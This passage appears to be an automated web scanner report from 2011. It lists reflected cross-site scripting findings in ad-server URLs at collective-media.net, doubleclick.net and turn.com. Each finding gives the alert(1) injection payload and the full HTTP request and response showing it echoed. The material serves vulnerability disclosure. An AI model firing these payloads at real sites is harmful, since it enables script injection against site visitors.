Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc; apnx=1; qcms=1; nadp=1; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Date: Mon, 09 May 2011 13:59:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:51 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6170/news;sz=728x90;net=q1;ord=949588501?6d6f8'-alert(1)-'b758fa577ec;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.13. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/be_news

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68e19'-alert(1)-'d718795e000 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj68e19'-alert(1)-'d718795e000/q1.q.gc.6170/be_news;sz=300x250;net=q1;ord=949612198;ord1=727744;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:26 GMT
Connection: close
Content-Length: 7406

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-19898961_1304949626","http://ad.doubleclick.net/adj68e19'-alert(1)-'d718795e000/q1.q.gc.6170/be_news;net=q1;u=,q1-19898961_1304949626,11f8f328940989e,polit,am.h-am.b-q1.polit_h-q1.none_m-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;cmw=owl;sz=300x250;net=q1;ord1=727744;contx=polit;dc=w
...[SNIP]...

3.14. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/be_news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba0fc'-alert(1)-'5132246e024 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170ba0fc'-alert(1)-'5132246e024/be_news;sz=300x250;net=q1;ord=949612198;ord1=727744;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:26 GMT
Connection: close
Content-Length: 7398

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-67990008_1304949626","http://ad.doubleclick.net/adj/q1.q.gc.6170ba0fc'-alert(1)-'5132246e024/be_news;net=q1;u=,q1-67990008_1304949626,11f8f328940989e,polit,am.h-am.b-q1.polit_h-q1.none_m-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;sz=300x250;net=q1;ord1=727744;contx=polit;dc=w;btg=am.h;btg=am.b;bt
...[SNIP]...

3.15. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/be_news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99f75'-alert(1)-'434975d6399 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170/be_news99f75'-alert(1)-'434975d6399;sz=300x250;net=q1;ord=949612198;ord1=727744;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:26 GMT
Connection: close
Content-Length: 7398

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-54782015_1304949626","http://ad.doubleclick.net/adj/q1.q.gc.6170/be_news99f75'-alert(1)-'434975d6399;net=q1;u=,q1-54782015_1304949626,11f8f328940989e,polit,am.h-am.b-q1.polit_h-q1.none_m-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;sz=300x250;net=q1;ord1=727744;contx=polit;dc=w;btg=am.h;btg=am.b;btg=q1.pol
...[SNIP]...

3.16. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/be_news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3363c'-alert(1)-'29286281e7c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170/be_news;sz=3363c'-alert(1)-'29286281e7c HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:25 GMT
Connection: close
Content-Length: 7350

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
tachAd("q1-54258070_1304949625","http://ad.doubleclick.net/adj/q1.q.gc.6170/be_news;net=q1;u=,q1-54258070_1304949625,11f8f328940989e,none,q1.polit_h-q1.none_m-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;sz=3363c'-alert(1)-'29286281e7c;contx=none;dc=w;btg=q1.polit_h;btg=q1.none_m;btg=dx.16;btg=dx.23;btg=dx.17;btg=cm.ent_h;btg=cm.music_h?","3363c'-alert(1)-'29286281e7c","",false);</scr'+'ipt>
...[SNIP]...

3.17. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/news

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9676a'-alert(1)-'a645e4959d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj9676a'-alert(1)-'a645e4959d/q1.q.gc.6170/news;sz=728x90;net=q1;ord=949588501;ord1=275382;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:59 GMT
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:59 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Content-Length: 7925

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-79836878_1304949599","http://ad.doubleclick.net/adj9676a'-alert(1)-'a645e4959d/q1.q.gc.6170/news;net=q1;u=,q1-79836878_1304949599,11f8f328940989e,polit,am.h-am.b-q1.polit_h-q1.none_l-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;cmw=owl;sz=728x90;net=q1;ord1=275382;contx=polit;dc=w;btg
...[SNIP]...

3.18. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db5a3'-alert(1)-'52fdd678b0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170db5a3'-alert(1)-'52fdd678b0b/news;sz=728x90;net=q1;ord=949588501;ord1=275382;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:59 GMT
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:59 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Content-Length: 7918

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-31434394_1304949599","http://ad.doubleclick.net/adj/q1.q.gc.6170db5a3'-alert(1)-'52fdd678b0b/news;net=q1;u=,q1-31434394_1304949599,11f8f328940989e,polit,am.h-am.b-q1.polit_h-q1.none_l-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;sz=728x90;net=q1;ord1=275382;contx=polit;dc=w;btg=am.h;btg=am.b;btg=q1
...[SNIP]...

3.19. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52ba9'-alert(1)-'5fe36e29226 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170/news52ba9'-alert(1)-'5fe36e29226;sz=728x90;net=q1;ord=949588501;ord1=275382;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:00 GMT
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 14:00:00 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 14:00:00 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 14:00:00 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 14:00:00 GMT
Content-Length: 7918

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-82061945_1304949600","http://ad.doubleclick.net/adj/q1.q.gc.6170/news52ba9'-alert(1)-'5fe36e29226;net=q1;u=,q1-82061945_1304949600,11f8f328940989e,polit,am.h-am.b-q1.polit_h-q1.none_l-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;sz=728x90;net=q1;ord1=275382;contx=polit;dc=w;btg=am.h;btg=am.b;btg=q1.poli
...[SNIP]...

3.20. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3685b'-alert(1)-'43c09f146d7 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170/news;sz=3685b'-alert(1)-'43c09f146d7 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:58 GMT
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:58 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:58 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:58 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:58 GMT
Content-Length: 7872

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
dAttachAd("q1-64798750_1304949598","http://ad.doubleclick.net/adj/q1.q.gc.6170/news;net=q1;u=,q1-64798750_1304949598,11f8f328940989e,none,q1.polit_h-q1.none_l-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;sz=3685b'-alert(1)-'43c09f146d7;contx=none;dc=w;btg=q1.polit_h;btg=q1.none_l;btg=dx.16;btg=dx.23;btg=dx.17;btg=cm.ent_h;btg=cm.music_h?","3685b'-alert(1)-'43c09f146d7","",false);</scr'+'ipt>
...[SNIP]...

3.21. http://ad.doubleclick.net/adj/cm.tribune/uscell_ldev_300x600_05311 [net parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The value of the net request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9931f'%3balert(1)//b7beab04221 was submitted in the net parameter. This input was echoed as 9931f';alert(1)//b7beab04221 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.tribune/uscell_ldev_300x600_05311;net=9931f'%3balert(1)//b7beab04221 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 298
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:00:03 GMT
Expires: Mon, 09 May 2011 14:00:03 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b02/0/0/%2a/u;44306;0-0;0;63773644;255-0/0;0/0/0;;~okv=;net=9931f';alert(1)//b7beab04221;~aopt=2/1/e454/0;~sscs=%3f"><img
...[SNIP]...

3.22. http://ad.doubleclick.net/adj/trb.orlandosentinel/biz [;ptype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.orlandosentinel/biz

Issue detail

The value of the ;ptype request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7438'%3balert(1)//81202d971f6 was submitted in the ;ptype parameter. This input was echoed as c7438';alert(1)//81202d971f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/trb.orlandosentinel/biz;;ptype=c7438'%3balert(1)//81202d971f6 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2234
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 13:59:55 GMT
Expires: Mon, 09 May 2011 13:59:55 GMT

document.write('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<MobileCreative adId=\"236335382\" clientSideImpressionTracking=\"false\"\n templateVersion=\"1.2\">\n    <Properties>\n     <Cre
...[SNIP]...
<![CDATA[http://ad.doubleclick.net/imp;v7;j;236335382;0-0;0;12928091;2000/2000;40669971/40687758/1;;~aopt=2/1/880a/1;~okv=;;ptype=c7438';alert(1)//81202d971f6;~cs=a%3f]]>
...[SNIP]...

3.23. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0bfe"><script>alert(1)</script>10708fa3251 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=a0bfe"><script>alert(1)</script>10708fa3251 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
